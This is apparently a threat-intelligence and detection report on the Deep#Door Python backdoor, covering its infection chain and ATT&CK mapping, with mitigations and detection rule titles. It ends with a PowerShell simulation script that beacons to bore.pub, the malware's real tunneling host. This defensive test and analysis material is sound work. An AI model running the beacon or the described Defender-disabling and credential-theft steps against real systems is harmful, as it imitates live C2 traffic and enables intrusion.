Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report examines Deep#Door, a stealthy Python-based backdoor delivered through an obfuscated batch loader that embeds and reconstructs its malicious payload at runtime. The malware uses a public TCP tunneling service for command-and-control, sets up several persistence mechanisms, weakens Windows security controls, and supports broad surveillance and credential-theft activity. It also performs detailed environment checks to evade sandboxes and analysts, while relying on in-memory API patching to stay concealed during execution.
Investigation
Securonix researchers mapped the full infection chain from the initial batch script to payload extraction, reconstruction, and execution of the final Python RAT. Their analysis identified abuse of bore.pub for tunneling, dynamically generated ports, and a custom authentication sequence used for operator access. The report also detailed the malware’s defense-evasion methods, persistence techniques, system discovery routines, and data exfiltration behavior.
Mitigation
Defenders should closely monitor script execution, enable PowerShell logging, detect unauthorized changes to Microsoft Defender and firewall settings, and audit startup entries, Run keys, and related persistence locations. Network monitoring should also focus on outbound connections to bore.pub and unusual high-port activity. EDR tooling capable of detecting API patching and in-memory tampering can further improve visibility into this threat.
Response
If Deep#Door activity is detected, isolate the affected endpoint immediately, terminate the malicious Python process, remove all persistence mechanisms including startup scripts, Run keys, and WMI subscriptions, and restore modified Defender and logging settings. Security teams should also perform memory and forensic analysis to identify hidden implants and assess credential theft exposure, while blocking network communication to bore.pub.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes Definitions action_user_execution["<b>Action</b> – <b>T1204 User Execution</b>: Victim runs malicious batch file install_obf.bat"] class action_user_execution action tool_batch_file["<b>Tool</b> – <b>Name</b>: install_obf.bat<br/><b>Description</b>: Batch script that launches the loader"] class tool_batch_file tool action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b>: Extracts base64/XOR encoded Python payload (svc.py) via selfu2011referencing PowerShell regex"] class action_obfuscation action tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Used to parse the batch file and decode the embedded payload"] class tool_powershell tool tool_python["<b>Tool</b> – <b>Name</b>: Python<br/><b>Description</b>: Executes the decoded svc.py payload"] class tool_python tool action_defense_evasion_disable["<b>Action</b> – <b>T1562.001 Disable or Modify Tools</b> / <b>T1562.004 Disable or Modify System Firewall</b> / <b>T1562.008 Disable or Modify Cloud Logs</b>: Disables Windows Defender, PowerShell logging, SmartScreen and firewall logging"] class action_defense_evasion_disable action tool_setmp["<b>Tool</b> – <b>Name</b>: Set-MpPreference<br/><b>Description</b>: Powershell cmdlet to change Defender settings"] class tool_setmp tool tool_netsh["<b>Tool</b> – <b>Name</b>: netsh advfirewall<br/><b>Description</b>: Modifies Windows firewall rules and logging"] class tool_netsh tool action_indicator_removal["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b> and <b>T1070.006 Timestomp</b>: Stops and clears EventLog/Sysmon services and alters file timestamps"] class action_indicator_removal action action_persistence_runkey["<b>Action</b> – <b>T1547.001 Registry Run Keys/Startup Folder</b> and <b>T1053 Scheduled Task/Job</b>: Drops SystemServices.vbs to Startup folder, creates Run key and a scheduled task as fallback"] class action_persistence_runkey action tool_vbs_startup["<b>Tool</b> – <b>Name</b>: SystemServices.vbs<br/><b>Description</b>: VBS script placed in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"] class tool_vbs_startup tool action_credential_access["<b>Action</b> – <b>T1003 OS Credential Dumping</b>, <b>T1552.004 Private Keys</b>, <b>T1552.001 Credentials In Files</b>, <b>T1555 Password Stores</b>, <b>T1555.005 Password Managers</b>: Harvests browser passwords, Windows Credential Manager, SSH keys, cloud tokens"] class action_credential_access action action_collection["<b>Action</b> – <b>T1056.001 Keylogging</b>, <b>T1113 Screen Capture</b>, <b>T1125 Video Capture</b>, <b>T1123 Audio Capture</b>, <b>T1115 Clipboard Data</b>: Captures keystrokes, screenshots, webcam video, microphone audio and clipboard"] class action_collection action action_discovery["<b>Action</b> – <b>T1082 System Information Discovery</b>, <b>T1518 Software Discovery</b>, <b>T1057 Process Discovery</b>, <b>T1046 Network Service Discovery</b>, <b>T1018 Remote System Discovery</b>, <b>T1526 Cloud Service Discovery</b>: Gathers OS, hardware, software, process, network and cloud configuration data"] class action_discovery action action_defense_evasion_reflective["<b>Action</b> – <b>T1620 Reflective Code Loading</b> and <b>T1497.003 Virtualization/Sandbox Evasion: Time Based</b>: Detects debuggers, virtual machines and sandbox characteristics and aborts execution"] class action_defense_evasion_reflective action action_c2_tunneling["<b>Action</b> – <b>T1572 Protocol Tunneling</b>: Establishes encrypted tunnel via public service bore.pub, performs dynamic port scanning and challengeu2011response authentication"] class action_c2_tunneling action action_exfiltration["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b> and <b>T1048.002 Exfiltration Over Alternative Protocol: Asymmetric Encrypted Nonu2011C2</b>: Sends harvested data through the tunneled channel"] class action_exfiltration action action_impact_forkbomb["<b>Action</b> – <b>T1499.002 Service Exhaustion Flood</b>: Executes a fork bomb to consume system resources"] class action_impact_forkbomb action %% Connections showing attack flow action_user_execution –>|executes| tool_batch_file tool_batch_file –>|contains| action_obfuscation action_obfuscation –>|uses| tool_powershell tool_powershell –>|decodes and launches| tool_python tool_python –>|performs| action_defense_evasion_disable action_defense_evasion_disable –>|uses| tool_setmp action_defense_evasion_disable –>|uses| tool_netsh action_defense_evasion_disable –>|leads to| action_indicator_removal action_indicator_removal –>|precedes| action_persistence_runkey action_persistence_runkey –>|drops| tool_vbs_startup action_persistence_runkey –>|enables| action_credential_access action_credential_access –>|enables| action_collection action_collection –>|feeds data to| action_discovery action_discovery –>|supports| action_defense_evasion_reflective action_defense_evasion_reflective –>|establishes| action_c2_tunneling action_c2_tunneling –>|carries| action_exfiltration action_exfiltration –>|triggers| action_impact_forkbomb "
Attack Flow
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
Suspicious Powershell Strings (via cmdline)
View
Call Suspicious .NET Classes/Methods from Powershell CommandLine (via process_creation)
View
Possible Remote System Discovery or Connectivity Check (via cmdline)
View
Possible Account or Group Enumeration / Manipulation (via cmdline)
View
Possible Timeout Usage for Delay Execution (via cmdline)
View
LOLBAS WScript / CScript (via process_creation)
View
Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Windows Defender Preferences Suspicious Changes (via powershell)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
IOCs (HashSha256) to detect: Deep#Door Stealer: Stealthy Python Backdoor and Credential Stealer Leveraging Tunneling, Multi-Layer Persistence, and In-Memory Surveillance Capabilities
View
Detect C2 Communication via Public TCP Tunneling Service [Windows Network Connection]
View
PowerShell Command for Embedded Python Payload Extraction [Windows Powershell]
View
Detection of Deep#Door Stealthy Python Backdoor Deployment [Windows Process Creation]
View
Detection of Bore.pub TCP Tunneling Service Usage for C2 Communications [Windows Network Connection]
View
Windows Defender Real-Time and Behavior Monitoring Disabled [Windows Powershell]
View
Deep#Door Obfuscated Batch Script Execution [Windows Process Creation]
View
PowerShell Command Disabling Windows Defender Features [Windows Powershell]
View
Detection of Deep#Door Stealthy Python Backdoor Execution [Windows Process Creation]
View
Detection of Stealth C2 Communication via bore.pub [Windows Network Connection]
View
Deep#Door Stealer Detection Using PowerShell and Firewall Tampering [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker who has gained a low‑privilege foothold on the Windows host wishes to establish a stealthy C2 channel using the publicly‑known
bore.pubtunneling service employed by Deep#Door. To blend in with legitimate traffic, the attacker selects a port from the 41,234‑41,243 range (chosen by the malware) and uses PowerShell’sSystem.Net.Sockets.TcpClientclass to open a raw TCP connection. The connection is kept idle for a short period to mimic a heartbeat before transmitting a small base‑64‑encoded beacon. -
Regression Test Script:
# Simulate Deep#Door C2 beacon to bore.pub on a random port within the monitored range $domain = 'bore.pub' $port = Get-Random -Minimum 41234 -Maximum 41244 # Upper bound is exclusive try { Write-Host "Connecting to $domain:$port ..." $client = New-Object System.Net.Sockets.TcpClient $client.Connect($domain, $port) $stream = $client.GetStream() # Minimal beacon payload (e.g., a base64‑encoded "ping") $payload = [System.Text.Encoding]::ASCII.GetBytes('cGlja2V0') $stream.Write($payload,0,$payload.Length) Write-Host "Beacon sent. Holding connection for 5 seconds..." Start-Sleep -Seconds 5 } catch { Write-Error "Connection failed: $_" } finally { if ($stream) { $stream.Close() } if ($client) { $client.Close() } Write-Host "Connection closed." } -
Cleanup Commands:
# No persistent artifacts; ensure no lingering TCP connections Get-NetTCPConnection -RemotePort 41234-41243 -State Established | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force } Write-Host "Cleanup complete."
End of Report